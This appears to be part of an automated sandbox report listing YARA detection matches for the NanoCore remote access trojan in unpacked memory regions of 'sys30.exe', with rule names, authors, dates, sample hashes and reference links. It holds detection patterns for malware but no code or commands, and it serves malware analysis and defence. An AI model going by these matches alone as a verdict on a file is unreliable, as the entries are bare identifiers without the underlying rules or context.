Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
